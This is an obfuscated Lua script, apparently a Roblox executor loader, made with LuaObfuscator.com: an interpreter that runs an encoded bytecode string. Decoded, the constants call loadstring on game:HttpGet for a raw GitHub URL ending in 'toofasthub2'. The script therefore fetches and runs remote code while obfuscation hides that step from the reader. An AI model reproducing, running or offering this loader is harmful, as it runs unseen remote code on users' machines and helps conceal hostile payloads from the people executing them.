--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v73=0;local v74;while true do if (v73==0) then v74=v2(v0(v30,16));if v19 then local v100=0;local v101;while true do if (1==v100) then return v101;end if (0==v100) then v101=v5(v74,v19);v19=nil;v100=1;end end else return v74;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v75=(v31/((1714 -(856 + 856))^(v32-(2 -1))))%((6 -4)^(((v33-(1 + (1966 -(1038 + 928)))) -(v32-(2 -1))) + ((78 + 172) -(220 + 29)))) ;return v75-(v75%(1 + 0)) ;else local v76=0 + 0 + (0 -0) ;local v77;while true do if ((857 -(563 + 173 + 5 + 116))==v76) then v77=2^(v32-(993 -(338 + 654))) ;return (((v31%(v77 + v77))>=v77) and (199 -(172 + 14 + 12))) or 0 ;end end end end local function v21()local v34=0;local v35;while true do if ((1 + (237 -(52 + 185)))==v34) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (796 -((2310 -1672) + 157)) ;v34=1 -0 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (6 -4) );v18=v18 + 2 ;return (v37 * (2156 -(797 + 1103))) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (587 -(54 + 531)) + 1 );v18=v18 + (548 -(238 + 306)) ;return (v41 * (904912 + 9677567 + 6194737)) + (v40 * (93924 -28388)) + (v39 * (1830 -(931 + 643))) + v38 ;end local function v24()local v42=906 -((940 -(363 + 368)) + 697) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1437 -(1039 + 397))) then v45=649 -(325 + 323) ;v46=(v20(v44,1089 -(802 + 286) ,18 + 2 ) * ((5 -3)^(7 + 25))) + v43 ;v42=2 + 0 ;end if (v42==(3 -1)) then v47=v20(v44,56 -35 ,70 -39 );v48=((v20(v44,1657 -(1289 + 336) )==(1 + 0)) and  -1) or (263 -(64 + 198)) ;v42=2 + 1 ;end if (v42==(1249 -(932 + 314))) then if (v47==0) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else v47=1273 -(385 + 256 + 631) ;v45=1098 -(674 + 424) ;end elseif (v47==(114 + 283 + 1650)) then return ((v46==0) and (v48 * ((1 -0)/(464 -(370 + (1312 -(1094 + 124))))))) or (v48 * NaN) ;end return v8(v48,v47-(277 + 746) ) * (v45 + (v46/((9 -7)^(21 + (1684 -(1080 + 573)))))) ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=933 -(119 + 813) ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v65=1645 -(864 + 780) , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=1894 -(1544 + 350) ;local v53;local v54;local v55;local v56;local v57;local v58;while true do local v67=0;while true do if (v67==0) then if (v52~=(0 + 0)) then else v53={};v54={};v55={};v52=1 + 0 ;end if (v52==3) then local v97=0 -0 ;local v98;while true do if (v97~=(553 -(504 + 49))) then else v98=0;while true do if (v98==(269 -(205 + 64))) then for v115=1,v23() do v54[v115-(2 -1) ]=v28();end for v117=1,v23() do v55[v117]=v23();end v98=775 -(501 + 273) ;end if (v98~=(1 + 0)) then else return v56;end end break;end end end v67=1;end if (v67==1) then if (v52~=(2 -1)) then else v56={v53,v54,nil,v55};v57=v23();v58={};v52=2;end if (v52==2) then local v99=0 -0 ;while true do if ((1593 -(410 + 1182))~=v99) then else for v105=40 -(20 + 19) ,v23() do local v106=0;local v107;local v108;while true do if ((1 + 0)~=v106) then else while true do if (v107==(1820 -(1094 + 726))) then v108=v21();if (v20(v108,849 -(661 + 187) ,1)==0) then local v140=1153 -(83 + 1070) ;local v141;local v142;local v143;local v144;local v145;while true do if (v140==(1 + 0)) then v143=nil;v144=nil;v140=2;end if (v140~=(1258 -(8 + 1250))) then else v141=0;v142=nil;v140=193 -(147 + 45) ;end if (v140==(1 + 1)) then v145=nil;while true do if (v141~=1) then else local v154=0 -0 ;while true do if (v154~=(1 + 0)) then else v141=2;break;end if (v154~=0) then else v144=nil;v145=nil;v154=1;end end end if (v141~=(4 -2)) then else while true do if (v142==3) then if (v20(v144,3,3)~=1) then else v145[4]=v58[v145[4 + 0 ]];end v53[v105]=v145;break;end if (v142==0) then local v165=1989 -(546 + 1443) ;while true do if (v165==(1 + 0)) then v142=1 -0 ;break;end if (v165==(1626 -(797 + 829))) then local v174=0 -0 ;while true do if (v174==0) then v143=v20(v108,2,3);v144=v20(v108,11 -7 ,2 + 4 );v174=1 + 0 ;end if (v174==1) then v165=1 + 0 ;break;end end end end end if (v142==(733 -(663 + 69))) then local v166=0;while true do if (v166==0) then v145={v22(),v22(),nil,nil};if (v143==(0 -0)) then local v178=0 -0 ;local v179;local v180;local v181;while true do if ((1 + 0)==v178) then v181=nil;while true do if (v179==1) then while true do if (v180~=0) then else v181=0 -0 ;while true do if (v181==0) then v145[774 -(53 + 718) ]=v22();v145[4 + 0 ]=v22();break;end end break;end end break;end if (v179==0) then local v189=0;while true do if (v189==1) then v179=3 -2 ;break;end if (v189~=(0 + 0)) then else v180=823 -(463 + 360) ;v181=nil;v189=1 + 0 ;end end end end break;end if ((1429 -(662 + 767))==v178) then v179=0 -0 ;v180=nil;v178=1 + 0 ;end end elseif (v143==1) then v145[3]=v23();elseif (v143==(922 -(732 + 188))) then v145[3]=v23() -(2^(58 -42)) ;elseif (v143~=(3 + 0)) then else local v190=0;local v191;while true do if (v190==(1314 -(1310 + 4))) then v191=0;while true do if (v191==(0 -0)) then v145[32 -(15 + 14) ]=v23() -((2 + 0)^(1813 -(819 + 978))) ;v145[4]=v22();break;end end break;end end end v166=1 + 0 ;end if (v166==(2 -1)) then v142=6 -4 ;break;end end end if (v142==(2 + 0)) then local v167=0;while true do if (v167~=(1282 -(1279 + 3))) then else if (v20(v144,1 + 0 ,1 -0 )~=1) then else v145[1581 -(912 + 667) ]=v58[v145[2]];end if (v20(v144,2,2)==(1831 -(659 + 1171))) then v145[3]=v58[v145[3]];end v167=1;end if (v167==(593 -(414 + 178))) then v142=3;break;end end end end break;end if (v141==(0 -0)) then v142=0;v143=nil;v141=1 + 0 ;end end break;end end end break;end end break;end if (v106==(0 -0)) then local v119=0;while true do if (v119==1) then v106=1642 -(608 + 1033) ;break;end if (v119~=0) then else local v138=0 -0 ;while true do if (v138==0) then v107=934 -(116 + 818) ;v108=nil;v138=823 -(92 + 730) ;end if (v138==(1 -0)) then v119=1;break;end end end end end end end v52=9 -6 ;break;end if (v99==(0 + 0)) then for v109=1 + 0 ,v57 do local v110=0;local v111;local v112;local v113;local v114;while true do if (1==v110) then v113=nil;v114=nil;v110=648 -(561 + 85) ;end if (v110~=2) then else while true do if (v111==(1 + 0)) then v114=nil;while true do if (v112==(968 -(146 + 821))) then if (v113==(547 -(437 + 109))) then v114=v21()~=0 ;elseif (v113==2) then v114=v24();elseif (v113~=(2 + 1)) then else v114=v25();end v58[v109]=v114;break;end if (v112==0) then local v149=0;while true do if (v149==0) then local v153=0;while true do if (v153==0) then v113=v21();v114=nil;v153=241 -(239 + 1) ;end if (v153~=(758 -(545 + 212))) then else v149=1022 -(63 + 958) ;break;end end end if ((1 + 0)==v149) then v112=1;break;end end end end break;end if ((0 -0)~=v111) then else local v139=0;while true do if (v139==1) then v111=1;break;end if (0~=v139) then else v112=0 -0 ;v113=nil;v139=96 -(13 + 82) ;end end end end break;end if (v110==0) then v111=0;v112=nil;v110=1;end end end v56[10 -7 ]=v21();v99=2 -1 ;end end end break;end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v68=1;local v69= -1;local v70={...};local v71=v12("#",...) -1 ;local function v72()local v78=v62;local v79=v63;local v80=v64;local v81=v27;local v82={};local v83={};local v84={};for v88=0 -0 ,v71 do if (((1455 + 2814 + 458)>=(937 -591)) and (v88>=v80)) then v82[v88-v80 ]=v70[v88 + 1 + 0 ];else v84[v88]=v70[v88 + (1230 -(489 + 740)) ];end end local v85=(v71-v80) + (1142 -(764 + 377)) ;local v86;local v87;while true do local v89=0;local v90;while true do if (((4600 -(71 + 114))>(6335 -(902 + 1189))) and (v89==(0 -0))) then v90=1396 -(452 + 944) ;while true do if ((v90==(3 -(358 -(214 + 142)))) or ((21474 -16723)<=(3965 -(667 + 151)))) then if (((3205 -2131)<=(3705 -(17 + 160))) and (v87<=(1 + 1))) then if ((v87<=(21 -(10 + 11))) or ((1627 -612)<(1814 -(1176 + 61)))) then do return;end elseif (((5086 -(94 + 1661))==(2678 + 653)) and (v87==(1982 -(1895 + 86)))) then local v120=0 -(1182 -(1061 + 121)) ;local v121;local v122;local v123;local v124;while true do if (((2606 -(307 + 852))<=(5581 -3667)) and (v120==(1 + (0 -0)))) then v123=nil;v124=nil;v120=7 -5 ;end if (((862 -(245 + (1563 -948)))==v120) or ((655 -347)<(591 -471))) then while true do if ((((2758 -(840 + 151)) -(69 + 244 + 209))==(442 + 803)) and (v121==(0 -0))) then local v150=0 + (0 -0) ;while true do if (((13535 -9476)>=(2269 + 902)) and (v150==(908 -(664 + 243)))) then v121=1043 -(173 + 869) ;break;end if (((526 + 2114)<=(1326 + 1032 + 494)) and (v150==(0 -0))) then v122=0 -0 ;v123=nil;v150=2 -1 ;end end end if ((v121==(1 + 0)) or ((4236 + 320)<(3086 + 13 + 39))) then v124=nil;while true do if ((v122==(124 -(18 + 105))) or (3382<=1523)) then v84[v123 + (3 -2) ]=v124;v84[v123]=v124[v86[2 + 2 ]];break;end if ((v122==0) or ((164 + 479 + 477)>=(7206 -4392))) then local v158=0 -0 ;while true do if (((2321 -((1309 -(569 + 683)) + 589))<((1825 + 8554) -6887)) and (1==v158)) then v122=754 -(638 + 115) ;break;end if (((3052 -(331 + 730))<(11595 -7671)) and ((174 -(82 + 92))==v158)) then local v168=0 -(0 -0) ;while true do if (((273 + 1444 + 3135)>=3453) and ((2 -(1 + 0))==v168)) then v158=1 + 0 ;break;end if ((v168==(837 -(199 + 638))) or ((5247 -3104)<(3142 -(903 + 403)))) then v123=v86[1 + 1 ];v124=v84[v86[3]];v168=1;end end end end end end break;end end break;end if ((4995>(2218 -(124 + 726 + 14))) and ((60 -(36 + 24))==v120)) then v121=929 -(82 + 847) ;v122=nil;v120=388 -((1494 -(341 + 887)) + 121) ;end end else v84[v86[2 + 0 ]]=v86[3 + 0 ];end elseif ((((189 -126) + 942)<(2130 + 1125)) and (v87<=4)) then if ((v87>3) or ((3021 -(1486 + 23))<((2351 -(751 + 65)) -(197 + 2 + 229)))) then local v127=(0 + 0) -0 ;local v128;while true do if ((v127==(0 + 0)) or ((2259 -(39 + 1453))>=(2979 -1946))) then v128=v86[2 + 0 + 0 ];v84[v128]=v84[v128](v13(v84,v128 + (2 -1) ,v69));break;end end else local v129=0 + 0 + 0 ;local v130;local v131;local v132;local v133;local v134;local v135;while true do if ((1==v129) or ((2064 -(61 + 50))==(944 + 734))) then v132=nil;v133=nil;v129=71 -(33 + 36) ;end if (((4896 -(516 + 215))>(3731 -(974 + 547))) and (v129==2)) then v134=nil;v135=nil;v129=3 + 0 ;end if ((v129==(10 -7)) or ((36 -21)>2714)) then while true do if (((2696 + 814)>(366 + 2354)) and (v130==1)) then local v151=0;while true do if (((1658 -(625 + 1032))==v151) or ((5788 -(547 + 1259))<=3132)) then v130=1061 -(514 + 545) ;break;end if (((3687 + 1120)>=4657) and (v151==(0 + 0))) then v133=nil;v134=nil;v151=1 + 0 ;end end end if ((v130==0) or ((16090 -(11267 -(122 + 33)))<=((2553 -(180 + 137)) -1144))) then local v152=76 -(53 + 23) ;while true do if ((v152==1) or ((1631 -(114 + 135))>=(1613 + 128))) then v130=456 -(9 + 446) ;break;end if ((v152==(0 -0)) or ((4402 -(1579 + 293))<(2121 -(119 + 181 + 1446)))) then v131=0 + 0 ;v132=nil;v152=2 -1 ;end end end if ((((3480 -(130 + 339)) -(17 + (459 -294)))<3965) and (v130==2)) then v135=nil;while true do if ((v131==2) or ((3754 -(44 + 112))<(3756 -(695 + 919)))) then for v162=v132,v69 do local v163=1495 -((1633 -864) + 726) ;while true do if ((v163==(0 + (0 -0))) or ((587 + 2420)<(1404 -593))) then v135=v135 + (798 -(191 + 606)) ;v84[v162]=v133[v135];break;end end end break;end if ((4601>=(1372 -782)) and ((1143 -(37 + 1105))==v131)) then local v159=1121 -(846 + 239 + 36) ;while true do if ((v159==0) or ((6634 -3820)==(4058 -(166 + 65)))) then local v169=0 + 0 ;while true do if (((4936 -(74 + 1513))==(4314 -(921 + 44))) and (v169==(0 + 0))) then v69=(v134 + v132) -(1691 -(484 + 202 + 1004)) ;v135=1439 -((1168 -446) + 717) ;v169=1 + 0 ;end if ((3877>=((2496 -1960) + 617)) and (v169==(1 + 0))) then v159=(6777 -4838) -(733 + 1205) ;break;end end end if (((11165 -7793)>219) and (v159==((1 + 0) -0))) then v131=2;break;end end end if ((v131==((0 -0) -0)) or (((1314 + 2117) -(245 + 304))<1191)) then local v160=1577 -(712 + (2641 -1776)) ;local v161;while true do if ((258<=(3896 -2597)) and (v160==(769 -(327 + 442)))) then v161=629 -(12 + 617) ;while true do if ((v161==1) or ((94 + 2767)>4947)) then v131=476 -(130 + 345) ;break;end if ((((406 + 1477) -(553 + 1305))<3194) and ((0 -0)==v161)) then local v177=0 -0 ;while true do if (((4067 -(189 + 77))>=(1892 -(26 + 65 + 1764))) and ((196 -(174 + 22))==v177)) then v132=v86[1292 -(907 + (557 -(78 + 96))) ];v133,v134=v81(v84[v132](v13(v84,v132 + (269 -(59 + 209)) ,v86[8 -(1564 -(1188 + 371)) ])));v177=643 -(309 + 333) ;end if (((5 + 0)<(2081 -(1185 + 12))) and ((2 -1)==v177)) then v161=1 -0 ;break;end end end end break;end end end end break;end end break;end if (((3161 -(661 + (2048 -(477 + 453))))>=(109 + 53)) and (v129==(0 -0))) then v130=0 -0 ;v131=nil;v129=1;end end end elseif ((v87>5) or ((4939 -(77 + 560))>(12821 -(8922 -(372 + 172))))) then v84[v86[2 + 0 ]]=v61[v86[2 + 1 ]];else v84[v86[9 -7 ]]();end v68=v68 + (1564 -(628 + 935)) ;break;end if (((3264 + (1105 -(624 + 29)))<((10751 -(125 + 91)) -6193)) and (v90==((0 -0) -0))) then v86=v78[v68];v87=v86[1];v90=1935 -(1800 + 134) ;end end break;end end end end A,B=v27(v11(v72));if  not A[1] then local v91=0;local v92;while true do if (0==v91) then v92=v59[4][v68] or "?" ;error("Script error at ["   .. v92   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403413O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5368652O733O682F47336E2O7A2F6D61696E2F742O6F666173746875623200083O0012063O00013O001206000100023O002001000100010003001202000300044O0003000100034O00045O00022O00053O000100016O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
